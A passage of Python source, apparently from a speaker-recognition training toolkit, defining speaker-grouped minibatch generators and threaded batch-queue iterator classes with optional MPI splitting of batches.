# beginning again when we reach the last speaker.
j = ( j + 1 ) % n_spk
# Check criteria for stopping the loop
finish_set = ( ( j == 0 ) and ( not allow_roll_over ) )
to_many_speakers = ( n_spk_batch + 1 > max_spk_per_batch)
to_many_utterances = ( n_utts_batch + spk_counts[ spk_ids[j] ] > max_utt_per_batch )
# Make a list of utterances (i-vectors) of the batch corresponding to
# all utterance of the selected speaker.
        utts = np.hstack([np.where(utt2spk == s)[0] for s in spk_ids[spk_indices_batch]])
#print utts
#print utts.shape
files = [ utt2file[u] for u in utts ]
i += 1 # Increase the batch index
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
# Print some info about the batch
if (verbose):
print(" ")
print("***")
print(" Preparing batch " + str(i) + " at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print(" speakers " + str( spk_indices_batch[ 0 ] ) + " - " + str( spk_indices_batch[ -1 ] ) + ", out of (n_spk) " + str(n_spk))
print(" n_spk_batch " + str(n_spk_batch) + " n_utts_batch " + str(n_utts_batch))
print(" speaker indices " + str( spk_indices_batch ))
print(" speaker IDs " + str( spk_ids[spk_indices_batch] ))
print(" sessions per speaker " + str ( spk_counts[spk_ids[spk_indices_batch]] ))
out_data_size = asizeof(data)
if (out_data_size > 1073741824):
print(" The batch size is %0.2f GB" % ( out_data_size / 1073741824.0 ))
elif (out_data_size > 1048576):
print(" The batch size is %0.2f MB" % ( out_data_size / 1048576.0 ))
elif (out_data_size > 1024):
print(" The batch size is %0.2f KB" % ( out_data_size / 1024.0 ))
else:
print(" The batch size is %0.2f B" % ( out_data_size ))
print(" Time taken to prepare batch: " + str( time.time() - start_time ) + "s")
print(" Done preparing batch at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print("***")
yield data
########################################################################################
# gen_mbatch_utt_groups
def create_utt_group_1( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd,
single_per_multi_groups = 500, rng=np.random):
s = []
for i in range(0,len(spk_counts) ):
# Get the utterances for a speaker.
spk_utts = np.where(utt2spk ==i )[0][rng.permutation( spk_counts[i])]
# Divide the speakers utterances into groups
if (spk_counts[i] ==1 ):
s.append( [spk_utts[0]] )
elif (spk_counts[i] % 2 == 0):
for j in range(0, spk_counts[i], 2):
s.append( [spk_utts[j], spk_utts[ j +1 ] ] )
else:
s.append([ spk_utts[0], spk_utts[ 1], spk_utts[2] ])
for j in range(3, spk_counts[i], 2):
s.append( [spk_utts[j], spk_utts[ j +1 ] ] )
# Randomize s (otherwise same speakers will always end up together)
s = [s[k] for k in rng.permutation(len(s))]
# Now groups ("pairs") in s will be grouped together to larger groups. Such groups are later used to form batches.
# "single_per_multi_groups" is how many "pairs" we want to have per such a group.
utts = []
ids = []
n_single_spk_groups = len(s)
# Number of large groups are rounded down. For example, if n_single_spk_groups=103
# and single_per_multi_groups=10, we will use 10 groups.
    n_multi_spk_groups = n_single_spk_groups // single_per_multi_groups
print("n_single_spk_groups:" + str(n_single_spk_groups))
print("n_multi_spk_groups:" + str(n_multi_spk_groups))
# Here we group the "pairs" together. With the example numbers above, we get the following:
# idx = ceil( 10.3 * [1,2,..,10] ) = ceil([10.3,...,103]) = [ 11, 21, 31, 42, 52, 62, 73, 83, 93, 103]
# This can fail in rare cases. Something numerical makes the last index x.000000001 which is ceiled.
# ---NEED TO BE FIXED
# As long as this does not happen, it should give the desired output.
# The outer "np.ceil" seems unecessary. Remove it?
idx = np.ceil(np.ceil(n_single_spk_groups/float(n_multi_spk_groups) * (np.arange(0, n_multi_spk_groups)+1)).reshape(n_multi_spk_groups,1) )
print(idx.T)
idx = np.concatenate((np.array(0).reshape(1,1), idx), axis=0).astype(int)
print(idx.T)
for i in range(1, n_multi_spk_groups +1):
        u = np.hstack([np.array(s[j]) for j in range(int(idx[i-1]), int(idx[i]))])
utts.append([u])
ids.append(utt2spk[ u ])
    # Final shuffling to avoid having all longer batches in the beginning
r = rng.permutation(len(utts))
    utts = [ utts[k] for k in r ]
ids = [ ids [k] for k in r ]
return [utts, ids]
def make_create_utt_group_1( single_per_multi_groups, rng=np.random ):
def create_utt_group(spk_name, utt2spk, spk_counts, utt2file, utt2scpInd ):
return create_utt_group_1( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd, single_per_multi_groups =single_per_multi_groups, rng=rng)
return create_utt_group
# ivec_dir, stats_dir, feat_dir
# stats_order: [0,1,2] for 0th, 1st, or both respectively.
def gen_mbatch_utt_groups(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False, batch_selection="diag",
create_utt_group_list_fcn =create_utt_group_1,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
b = 0 # Batch index
new_epoch = True # This variable indicates whether a new epoch is about to start
while True:
# For checking the time to create the batch
if (verbose):
start_time = time.time()
print(" ")
print("***")
print(" Preparing batch " + str(b) + " at " + time.strftime("%Y-%m-%d %H:%M:%S"))
# If a new epoch is about to start, we will group the utterances.
# The provided function "create_utt_group_list_fcn" is used for this.
        # Note: This will happen regardless of the value of allow_roll_over
if ( new_epoch):
print("Obtaining utterances groups")
[groups_u, groups_s] = create_utt_group_list_fcn( spk_name, utt2spk, spk_counts, utt2file, utt2scpInd ) # Are all these inputs needed in general???
new_epoch = False
b = 0
if(batch_selection == "rowwise"):
[ i_ind, j_ind ] =np.triu_indices( len(groups_s) )
elif(batch_selection == "random"):
[ i_ind, j_ind ] =np.triu_indices( len(groups_s) )
r = rng.permutation(len( i_ind ))
i_ind = i_ind[r]
j_ind = j_ind[r]
# Depending on batch selection method, we load/prepare the data
# differently
if (batch_selection == "diag"):
# If "diag" we only need to load the data once
utts = groups_u[b][0]
files = [utt2file[u] for u in utts ]
n_spk_batch = len(np.unique(groups_s[b])) # Number of speaker in the batch
n_utts_batch = len(groups_u[b][0] ) # Number of utterances in the batch
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
if (verbose):
print(" i and j = : " + str(b))
print(" n_spk_batch: " + str(n_spk_batch) + " n_utts_batch " + str(n_utts_batch))
print(" Speakers: " + str( groups_s[b] ))
print(" Utterances: " + str( groups_u[b] ))
b += 1 # Increase the batch index
if b == len(groups_s):
new_epoch = True
elif(batch_selection == "rowwise"):
# In this case, we only load a new "i" batch if it change from
# last time but we always reload the "j" batch.
if ( (b == 0) or ( i_ind[ b] != i_ind[ b] ) ):
utts_i = groups_u[i_ind[ b ]][0]
files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
utts_j = groups_u[j_ind[ b ]][0]
files_j = [utt2file[u] for u in utts_j ]
data_j = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_j)
if ( output_utt_id ):
data_j.append(utts_j)
            n_spk_i = len( np.unique( groups_s[ i_ind[b] ] )) # Number of speakers in i
            n_spk_j = len( np.unique( groups_s[ j_ind[b] ] )) # Number of speakers in j
n_utt_i = len( groups_u[ i_ind[b] ][0] ) # Number of utterances in i
n_utt_j = len( groups_u[ j_ind[b] ][0] ) # Number of utterances in j
data = [data_i, data_j]
if (verbose):
print("i " + str(i_ind[b]) + ", j = " + str(j_ind[b]))
print(" n_spk_i: " + str(n_spk_i) + " n_utt_i " + str(n_utt_i))
print(" n_spk_j: " + str(n_spk_j) + " n_utt_j " + str(n_utt_j))
print(" Speakers i: " + str( groups_s[ i_ind[b] ] ))
print(" Speakers j: " + str( groups_s[ j_ind[b] ] ))
print(" Utterances i: " + str( groups_u[ i_ind[b] ] ))
print(" Utterances j: " + str( groups_u[ j_ind[b] ] ))
b += 1
if b == len(i_ind):
new_epoch = True
elif(batch_selection == "random"):
# In this case, we usually have to load both the "i" and
# "j" data.
if (i_ind[ b ] == j_ind[ b ]):
utts_i = groups_u[i_ind[ b ]][0]
files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
utts_j = utts_i
data_j = data_i
else:
utts_i = groups_u[i_ind[ b ]][0]
files_i = [utt2file[u] for u in utts_i ]
data_i = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_i)
if ( output_utt_id ):
data_i.append(utts_i)
                utts_j = groups_u[j_ind[ b ]][0]
                files_j = [utt2file[u] for u in utts_j ]
data_j = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts_j)
if ( output_utt_id ):
data_j.append(utts_j)
            n_spk_i = len( np.unique( groups_s[ i_ind[b] ] )) # Number of speakers in i
            n_spk_j = len( np.unique( groups_s[ j_ind[b] ] )) # Number of speakers in j
n_utt_i = len( groups_u[ i_ind[b] ][0] ) # Number of utterances in i
n_utt_j = len( groups_u[ j_ind[b] ][0] ) # Number of utterances in j
data = [data_i, data_j]
if (verbose):
print("i " + str(i_ind[b]) + ", j = " + str(j_ind[b]))
print(" n_spk_i: " + str(n_spk_i) + " n_utt_i " + str(n_utt_i))
print(" n_spk_j: " + str(n_spk_j) + " n_utt_j " + str(n_utt_j))
print(" Speakers i: " + str( groups_s[ i_ind[b] ] ))
print(" Speakers j: " + str( groups_s[ j_ind[b] ] ))
print(" Utterances i: " + str( groups_u[ i_ind[b] ] ))
print(" Utterances j: " + str( groups_u[ j_ind[b] ] ))
b += 1 # Increase the batch index
if b == len(i_ind):
new_epoch = True
# Print some info about the batch
if (verbose):
out_data_size = asizeof(data)
if (out_data_size > 1073741824):
print(" The batch size is %0.2f GB" % ( out_data_size / 1073741824.0 ))
elif (out_data_size > 1048576):
print(" The batch size is %0.2f MB" % ( out_data_size / 1048576.0 ))
elif (out_data_size > 1024):
print(" The batch size is %0.2f KB" % ( out_data_size / 1024.0 ))
else:
print(" The batch size is %0.2f B" % ( out_data_size ))
print(" Time taken to prepare batch: " + str( time.time() - start_time ) + "s")
print(" Done preparing batch at " + time.strftime("%Y-%m-%d %H:%M:%S"))
print("***")
yield data
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
def gen_mbatch_spk_bal(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False,
arrange_spk_fcn = None, n_spk_per_batch=50, n_utt_per_spk=2,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random, out2put_utt2sideInfo=False ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
if out2put_utt2sideInfo:
utt2sideInfo = scp_info[ 'utt2sideInfo' ]
n_spk = len(spk_name)
# Randomize the speakers
spk_arr = []
# This list has one entry per speaker which keeps a list of the speakers utterances
spk2utt_fixed = [np.where(utt2spk ==i)[0] for i in range(n_spk)]
    # As above but the speakers' utterance lists are randomized and gradually popped when
    # batches are created. Whenever a list becomes empty, a new one is created randomly.
spk2utt_rand = [ spk2utt_fixed[i][ rng.permutation(len(spk2utt_fixed[i])) ] for i in range(n_spk) ]
while True:
if len(spk_arr) < n_spk_per_batch:
spk_arr = spk_arr + list(rng.permutation( n_spk ))
spk_this_batch = spk_arr[0:n_spk_per_batch]
del spk_arr[0:n_spk_per_batch]
utts = np.array([], dtype=int)
for i in range( len(spk_this_batch) ):
ii = spk_this_batch[i]
if ( len( spk2utt_rand[ii] ) < n_utt_per_spk ):
spk2utt_rand[ii] = np.concatenate( [spk2utt_rand[ii], spk2utt_fixed[ii][ rng.permutation(len(spk2utt_fixed[ii])) ] ] )
utts = np.concatenate((utts, spk2utt_rand[ii][0:n_utt_per_spk]))
spk2utt_rand[ii] = np.delete( spk2utt_rand[ii], np.arange(0, n_utt_per_spk) )
files = [utt2file[u] for u in utts ]
###
#data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
# max_length, frame_step, output_labs, output_scp_ind, utts)
data = [[]]
if (output_labs):
data.append(utt2spk[utts])
# Append the scp indices for the selected utterances if wanted.
        # (Can be used for e.g. looking up trial weights or
        # for obtaining e.g., i-vectors or 0th stats if these
        # are already stored on the GPU)
if (output_scp_ind):
batch_scp_ind = [utt2scpInd[u] for u in utts]
data.append( batch_scp_ind )
if ( output_utt_id ):
data.append(utts)
if ( out2put_utt2sideInfo ):
sideInfo = [ utt2sideInfo[u] for u in utts ]
data.append( sideInfo )
yield data
# Returns an iterator that gives batches consisting of "n_spk_per_batch"
# randomly selected speakers with "n_utt_per_spk" segments each.
def gen_mbatch_spk_bal_semi(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
frame_step=1, max_length=30000,
y_function=None, verbose=False,
arrange_spk_fcn = None, n_spk_per_batch=50, n_utt_per_spk=2,
output_labs=True, output_scp_ind=False, output_utt_id=False,
rng=np.random, out2put_utt2sideInfo=False, n_unk_per_batch=50 ):
# We assume "scp_info" either the scp file name or the
# info resulting from reading it with "get_scp_info(.)"
if not isinstance(scp_info, dict):
scp_info = get_scp_info(scp_info, ivec_dir, stats_dir, feat_dir)
utt2file = scp_info[ 'utt2file' ]
utt2spk = scp_info[ 'utt2spk' ]
utt2scpInd = scp_info[ 'utt2scpInd' ]
spk_name = scp_info[ 'spk_name' ]
spk_counts = scp_info[ 'spk_counts' ]
if out2put_utt2sideInfo:
utt2sideInfo = scp_info[ 'utt2sideInfo' ]
    # Make sure one spk name is "unk"
    assert np.any(np.asarray(spk_name) == "unk"), 'Expected one speaker name to be "unk"'
unk_spk_id = np.asarray( spk_name == "unk" ).nonzero()[0][0]
# A list of the speaker IDs that are not "unk"
spk_fixed = list(range( len(spk_name)))
del spk_fixed[unk_spk_id]
n_spk = len(spk_name) -1
    # For now we assert unk is the last ID. Otherwise we need to update the returned labels. The train script assumes the last ID is unk.
assert (unk_spk_id == n_spk)
# Randomize the speakers
spk_arr = []
# This list has one entry per speaker which keeps a list of the speakers utterances
spk2utt_fixed = [np.where(utt2spk ==i )[0] for i in spk_fixed]
log.info("Number of speakers: %d", len(spk2utt_fixed))
n_sup_utt = sum([len(spk2utt_fixed[i]) for i in range(n_spk) ])
log.info("Number of utterances with speaker ID: %d", n_sup_utt)
    # As above but the speakers' utterance lists are randomized and gradually popped when
    # batches are created. Whenever a list becomes empty, a new one is created randomly.
spk2utt_rand = [ spk2utt_fixed[i][ rng.permutation(len(spk2utt_fixed[i])) ] for i in range(n_spk) ]
    unk2utt_fixed = np.where( utt2spk == unk_spk_id )[0]
unk2utt_rand = np.random.permutation( unk2utt_fixed )
log.info("Number of utterances with unknown speakers: %d", unk2utt_fixed.shape[0])
while True:
# This part is for the supervised data
if len(spk_arr) < n_spk_per_batch:
spk_arr = spk_arr + list(rng.permutation( n_spk ))
spk_this_batch = spk_arr[0:n_spk_per_batch]
del spk_arr[0:n_spk_per_batch]
utts = np.array([], dtype=int)
for i in range( len(spk_this_batch) ):
ii = spk_this_batch[i]
if ( len( spk2utt_rand[ii] ) < n_utt_per_spk ):
spk2utt_rand[ii] = np.concatenate( [spk2utt_rand[ii], spk2utt_fixed[ii][ rng.permutation(len(spk2utt_fixed[ii])) ] ] )
utts = np.concatenate((utts, spk2utt_rand[ii][0:n_utt_per_spk]))
spk2utt_rand[ii] = np.delete( spk2utt_rand[ii], np.arange(0, n_utt_per_spk) )
# This part is for the unsupervised data
if ( len( unk2utt_rand ) < n_unk_per_batch ):
unk2utt_rand = np.concatenate( [unk2utt_rand, unk2utt_fixed[ rng.permutation(len(unk2utt_fixed)) ] ] )
utts = np.concatenate((utts, unk2utt_rand[0:n_unk_per_batch]))
unk2utt_rand = np.delete( unk2utt_rand, np.arange(0, n_unk_per_batch) )
files = [utt2file[u] for u in utts ]
###
data = load_data(scp_info, ivec_dir, stats_dir, feat_dir, stats_order,
max_length, frame_step, output_labs, output_scp_ind, utts)
if ( output_utt_id ):
data.append(utts)
if ( out2put_utt2sideInfo ):
sideInfo = [ utt2sideInfo[u] for u in utts ]
data.append( sideInfo )
yield data
# This class generates batches from an iterator like the one above.
# It creates an additional thread which is used to load data while
# the training is ongoing. The maximum number of batches it can keep
# in the queue is given by "batch_que_length".
class batch_iterator(object):
def __init__(self, it_tr, train_scp_info, load_feats_train, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it_tr = it_tr
self.train_scp_info = train_scp_info
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.load_feats_train = load_feats_train
self.annoying_train = annoying_train
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
            self.batch_thread.daemon = True # Daemon thread so it does not keep the process alive when the main thread exits.
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
# [X, Y, U] = self.it_tr.next()
BB = next(self.it_tr)
if len(BB)==3:
[X, Y, U] = BB
elif len(BB)==4 :
[X, Y, U, S] = BB
else:
log.error("ERROR: Wrong output from iterator")
if isinstance(U, list):
control_nb = U[0][0]
else:
control_nb = U[0]
if self.use_mpi:
                    # Divide the utterances of the batch. Which ones this worker will
                    # process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
                    if len(BB) == 4:
                        S = S[start:end]
else:
start = 0
end = len(Y)
tr_files = [ self.train_scp_info['utt2file'][u] for u in U]
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats_train( tr_files )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_tr_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
log.info( tr_files[bu] )
bad_tr_files.append(tr_files[bu])
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
                        # Note that, of course, we don't need to remove anything from tr_feats, since
                        # no features have been added for the utterances where there were no features :)
self.batch_number += 1
#batch = [[X,Y,U], bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats_train( tr_files )
bad_tr_files = []
tr_idx = None
#batch = [[X,Y,U], bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
        # This should work though, together with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
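# Usage sketch (it_tr, train_scp_info and load_feats_train are assumed to be
# provided by the caller; names are illustrative). get_batch() returns the
# first five elements of a queued entry:
#   bi = batch_iterator(it_tr, train_scp_info, load_feats_train,
#                       annoying_train=False, batch_que_length=2)
#   BB, bad_files, (feats, idx), batch_number, control_nb = bi.get_batch()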
# As above but takes a list of iterators and scp info corresponding to different sets.
# Each set will be used once per batch
class batch_iterator_multi_set(object):
def __init__(self, it, scp_info, load_feats, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it = it
self.scp_info = scp_info
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.load_feats = load_feats
self.annoying_train = annoying_train
self.n_sets = len(self.it)
assert len(self.it) == len(self.scp_info)
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
            self.batch_thread.daemon = True # Daemon thread so it does not keep the process alive when the main thread exits.
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
X = []
Y = []
U = []
S = []
for it in self.it:
#[x, y, u] = it.next()
B = next(it)
if len(B) ==3:
X.append(B[0])
Y.append(B[1])
U.append(B[2])
elif len(B) ==4:
X.append(B[0])
Y.append(B[1])
U.append(B[2])
S.append(B[3])
else:
log.error("ERROR: Wrong output from iterator")
if (len(S)>0):
BB = [X,Y,U,S]
else:
BB = [X,Y,U]
control_nb = U[0][0]
if self.use_mpi:
log.error("Multi set training not supported with MPI training.")
"""
# Divede utterances of the batch. Which one this worker will
# process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
"""
else:
start = 0
#end = len(Y)
end = len(Y[0])
#tr_files = [ self.train_scp_info['utt2file'][u] for u in U]
files = []
for i in range(self.n_sets):
files += [ self.scp_info[i]['utt2file'][u] for u in U[i]]
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats( files )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
log.info( files[bu] )
bad_files.append(files[bu])
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
                        # Note that, of course, we don't need to remove anything from tr_feats, since
                        # no features have been added for the utterances where there were no features :)
self.batch_number += 1
batch = [BB, bad_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats( files )
bad_files = []
tr_idx = None
batch = [BB, bad_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X[0][0:3] =" + str(X[0][0:3]) + ", Y[0][0:3] =" + str(Y[0][0:3]) + ", U[0][0:3] =" + str(U[0][0:3]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
        # This should work though, together with the changes above.
while(len( self.qued_batches ) ==0 ):
if (self.batch_que_length == 0):
#print "A"
self.prep_batches(break_loop=True)
else:
time.sleep(1)
b = self.qued_batches.pop(0)
log.info("Will process data %d to %d in batch." % (b[5], b[6]))
return b[0:5]
####
# This class generates batches from an iterator like the one above.
# It creates an additional thread which is used to load data while
# the training is ongoing. The maximum number of batches it can keep
# in the queue is given by "batch_que_length".
class batch_iterator_2(object):
def __init__(self, it_tr, load_feats, annoying_train=True, batch_que_length=2, batch_number=0, use_mpi=False, mpi_size=1, mpi_rank=0 ):
self.delete = False
self.it_tr = it_tr
self.batch_que_length = batch_que_length
self.qued_batches = []
self.batch_number = batch_number
self.use_mpi = use_mpi
self.mpi_size = mpi_size
self.mpi_rank = mpi_rank
self.annoying_train = annoying_train
self.load_feats = load_feats
#self.prep_batches(break_loop=True) # To make sure they are filled from the beginning
if (self.batch_que_length > 0 ):
self.batch_thread = threading.Thread( target =self.prep_batches )
            self.batch_thread.daemon = True # Daemon thread so it does not keep the process alive when the main thread exits.
self.batch_thread.start()
#else:
# self.batch_que_length =1
"""
#def __del__(self):
# self.delete = True # This will stop the loop and thus finish the thread
# #time.sleep(5)
# self.batch_thread.join()
# print "Batch iterator thread done"
"""
def prep_batches(self, break_loop=False):
while not self.delete:
if ( (len(self.qued_batches) < self.batch_que_length) or self.batch_que_length == 0 ):
log.debug( "Only " + str( len(self.qued_batches) ) + " batches in the que. Increasing it." )
# [X, Y, U] = self.it_tr.next()
BB = next(self.it_tr)
if len(BB)==3:
[X, Y, U] = BB
elif len(BB)==4 :
[X, Y, U, S] = BB
else:
log.error("ERROR: Wrong output from iterator")
if isinstance(U, list):
control_nb = U[0][0]
else:
control_nb = U[0]
if self.use_mpi:
                    # Divide the utterances of the batch. Which ones this worker will
                    # process depends on the mpi_rank (process number) of the process.
N = U.shape[0] # Total number of files
job_indices = np.round(np.linspace(0 , N, self.mpi_size + 1))
start = int( job_indices[self.mpi_rank] )
end = int( job_indices[self.mpi_rank + 1] )
N_this_batch = end - start
X = X[start:end]
Y = Y[start:end]
U = U[start:end]
                    if len(BB) == 4:
                        S = S[start:end]
else:
start = 0
end = len(Y)
if not self.annoying_train:
[tr_feats, tr_idx ] = self.load_feats( U )
bad_utts = np.where(tr_idx[1:] - tr_idx[0:-1] == 0 )[0] # For tensor input
bad_tr_files = []
if ( len( bad_utts ) > 0 ):
log.info(" Got a one or more zero-length utterances. This should not happen. This utterance will be discarded but this means batch for this speaker might have been suboptimal. Should be fixed Utterance(s): ")
for bu in bad_utts[::-1]:
#log.info( tr_files[bu] )
#bad_tr_files.append(tr_files[bu])
log.info( bu )
bad_tr_files.append( bu )
Y = np.delete(Y, bu)
U = np.delete(U, bu)
if len(BB)==4 :
S = np.delete(S, bu)
tr_idx = np.delete(tr_idx, bu)
                        # Note that, of course, we don't need to remove anything from tr_feats, since
                        # no features have been added for the utterances where there were no features :)
self.batch_number += 1
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("tr_idx= " + str(tr_idx[0]) + ", self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
else:
# This is for tensor input
self.batch_number += 1
tr_feats = self.load_feats( U )
bad_tr_files = []
tr_idx = None
batch = [BB, bad_tr_files, [tr_feats, tr_idx ], self.batch_number, control_nb, start, end]
log.debug("X =" + str(X) + ", Y =" + str(Y[0]) + ", U =" + str(U[0]) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
log.debug("self.batch_number= " + str(self.batch_number) + ", control_nb= " + str(control_nb) )
self.qued_batches.append( batch )
if ( break_loop ):
break
else:
if ( break_loop ):
break
time.sleep(1)
def get_batch(self):
# The stuff commented out below may interfere in the other thread that
# runs prep_batches. Had problems with this so keep it here as a warning.
"""
if (len( self.qued_batches ) ==0 ):
self.prep_batches(break_loop=True)
"""
        # This should work though, together with the changes above.
